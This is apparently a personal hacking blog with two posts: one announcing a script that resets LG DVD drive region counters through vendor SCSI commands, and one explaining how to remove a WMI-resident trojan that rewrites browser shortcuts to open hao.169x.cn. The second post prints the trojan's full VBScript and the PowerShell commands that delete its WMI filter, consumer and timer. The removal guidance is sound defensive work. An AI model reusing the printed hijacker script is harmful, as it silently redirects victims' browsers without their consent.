Post a video on YouTube and it will be featured here!
Do you have a brand new device you want me to hack?
Send it to me!
Are you producing a device and want me to check it's security?
Send me an email!
As of now more than 3500 people unlocked Huawei E585, E5830,
E5832S, E583C and HW-01C successfully!





Wednesday, December 14, 2016

LG DVD REGION RESET (GUD0N, GUD1N and others)


As everyone probably knows,
DVD players are limited by software to watch
DVD of the region the player was bought from.
The user can change the region 4 times
(the first time is changed automatically
when the first DVD is played).
After some research I found that
many players have secret SCSI commands to
reset the counter.
This is called vendor reset.
Also this is limited though.
And can be used only 5 times.
But since I don't like commercial limits,
I wrote a small utility that can reset everything.
Have a look at this github link.


The script has been tested and it's guaranteed
on LG (and HP) DVDRAM GUD0N and GUD1N
It can work also on many other LG players
probaby GT series, but I can't vouch for them
since I only have these two in my laptops.

The bash shell script works AS IS in linux (tested on ubuntu)
and CYGWIN on Windows.

Namaste!
Zibri
(donations are welcome)

Friday, October 21, 2016

HAO.169x.cn Virus removal.

Hello!
After fighting with this nasty trojan I finally found a solution.

The trojan resides inside windows WMI.

It executes a script that looks like this:


On Error Resume Next
Const link = "http://hao.169x.cn/?v=108&m=yx"
Const link360 = "http://hao.169x.cn/?v=108&m=yx&s=3"
browsers = "114ie.exe,115chrome.exe,1616browser.exe,2345chrome.exe,2345explorer.exe,360se.exe,360chrome.exe,,avant.exe,baidubrowser.exe,chgreenbrowser.exe,chrome.exe,firefox.exe,greenbrowser.exe,iexplore.exe,juzi.exe,kbrowser.exe,launcher.exe,liebao.exe,maxthon.exe,niuniubrowser.exe,qqbrowser.exe,sogouexplorer.exe,srie.exe,tango3.exe,theworld.exe,tiantian.exe,twchrome.exe,ucbrowser.exe,webgamegt.exe,xbrowser.exe,xttbrowser.exe,yidian.exe,yyexplorer.exe"
lnkpaths = "C:\Users\Public\Desktop,C:\ProgramData\Microsoft\Windows\Start Menu\Programs,C:\Users\shome\Desktop,C:\Users\shome\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch,C:\Users\shome\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu,C:\Users\shome\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar,C:\Users\shome\AppData\Roaming\Microsoft\Windows\Start Menu\Programs"
browsersArr = Split(browsers,",")
Set oDic = CreateObject("scripting.dictionary")
For Each browser In browsersArr
    oDic.Add LCase(browser), browser
Next
lnkpathsArr = Split(lnkpaths,",")
Set oFolders = CreateObject("scripting.dictionary")
For Each lnkpath In lnkpathsArr
    oFolders.Add lnkpath, lnkpath
Next
Set fso = CreateObject("Scripting.Filesystemobject")
Set WshShell = CreateObject("Wscript.Shell")
For Each oFolder In oFolders
    If fso.FolderExists(oFolder) Then
      For Each file In fso.GetFolder(oFolder).Files
            If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then
                Set oShellLink = WshShell.CreateShortcut(file.Path)
                path = oShellLink.TargetPath
                name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path)
                If oDic.Exists(LCase(name)) Then
                  If LCase(name) = LCase("360se.exe") Then
                        oShellLink.Arguments = link360
                  Else
                        oShellLink.Arguments = link
                  End If
                  If file.Attributes And 1 Then
                        file.Attributes = file.Attributes - 1
                  End If
                  oShellLink.Save
                End If
            End If
      Next
    End If
Next
to remove it is quite simple:

run powershell as administrator and the issue these 4 commands:


gwmi -Namespace "root/cimv2" -Class __FilterToConsumerBinding -Filter "Filter = ""__eventfilter.name='VBScriptKids_filter'""" | Remove-WmiObject
gwmi -Namespace "root/cimv2" -Class ActiveScriptEventConsumer -Filter "Name = 'VBScriptKids_consumer'" | Remove-WmiObject
gwmi -Namespace "root/cimv2" -Class __IntervalTimerInstruction -Filter "TimerID = 'VBScriptKids_timer'" | Remove-WmiObject
gwmi -Namespace "root/cimv2" -Class __EventFilter -Filter "Name = 'VBScriptKids_filter'" | Remove-WmiObject


P.S.
The trojan has been found in many softwares including KMS10.
You should remove these softwares too.